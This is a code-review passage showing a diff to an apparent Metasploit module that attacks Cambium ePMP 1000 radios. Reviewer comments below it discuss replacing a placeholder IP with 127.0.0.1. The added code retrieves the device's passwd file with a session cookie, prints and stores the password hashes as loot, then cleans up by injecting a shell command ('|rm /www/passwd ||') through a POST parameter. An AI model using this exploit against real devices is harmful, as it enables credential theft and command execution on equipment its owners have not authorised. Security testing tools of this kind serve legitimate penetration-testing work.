modules/auxiliary/scanner/http/epmp1000_dump_hashes.rb

```diff
@@ -35,278 +35,134 @@ def initialize(info={})
-          return true
-        end
-      end
-    else
-      print_error("#{rhost}:#{rport} - Application does not appear to be Cambium ePMP 1000. Module will not continue.")
-      return false
-    end
-  end
-
-  #
-  # Dump ePMP Password Hashes
-  #
-
-  def do_login(user, pass)
-    print_status("#{rhost}:#{rport} - Attempting to login...")
-    begin
+      # retrieve passwd file
       res = send_request_cgi(
         {
-          'uri' => '/cgi-bin/luci',
-          'method' => 'POST',
+          'method' => 'GET',
+          'uri' => '/passwd',
+          'cookie' => cookie,
           'headers' => {
+            'Accept' => '*/*',
+            'Accept-Language' => 'en-US,en;q=0.5',
+            'Accept-Encoding' => 'gzip, deflate',
             'X-Requested-With' => 'XMLHttpRequest',
-            'Accept' => 'application/json, text/javascript, */*; q=0.01'
-          },
-          'vars_post' =>
-            {
-              'username' => 'dashboard',
-              'password' => ''
-            }
-        }
+            'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
+            'Connection' => 'close'
+          }
+        }, 25
       )
 
       good_response = (
         res &&
-        res.code == 200
+        res.code == 200 && res.body =~ /root/
       )
 
       if good_response
-        sysauth_value = res.get_cookies.scan(/((.*)[$ ])/).flatten[0] || ''
+        vprint_status('++++++++++++++++++++++++++++++++++++++')
+        vprint_status("#{rhost}:#{rport} - Dumping password hashes")
+        print_line("#{res.body}")
+        vprint_status('++++++++++++++++++++++++++++++++++++++')
 
-        cookie1 = "#{sysauth_value}; " + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D"
+        path = store_loot('ePMP_passwd', 'text/plain', rhost, res.body, 'Cambium ePMP 1000 password hashes')
+        print_status("#{rhost}:#{rport} - Hashes saved in: #{path}")
+
+        # clean up the passwd file from /www/
+        command = 'rm /www/passwd'
+        inject = '|' + "#{command}" + ' ||'
+        clean_inject = CGI.unescapeHTML(inject.to_s)
 
         res = send_request_cgi(
           {
-            'uri' => '/cgi-bin/luci',
+            'uri' => config_uri,
             'method' => 'POST',
-            'cookie' => cookie1,
+            'cookie' => cookie,
             'headers' => {
+              'Accept' => '*/*',
+              'Accept-Language' => 'en-US,en;q=0.5',
+              'Accept-Encoding' => 'gzip, deflate',
               'X-Requested-With' => 'XMLHttpRequest',
-              'Accept' => 'application/json, text/javascript, */*; q=0.01',
+              'ctype' => '*/*',
               'Connection' => 'close'
             },
             'vars_post' =>
               {
-                'username' => user,
-                'password' => pass
+                'ping_ip' => '8.8.8.8', # This parameter can also be used for injection
```

Comment:
Make this some private, non-routable IP.  No point littering Google's address space in here.  127.0.0.1 should be fine.

Reply:
yeppers.

Reply:
+1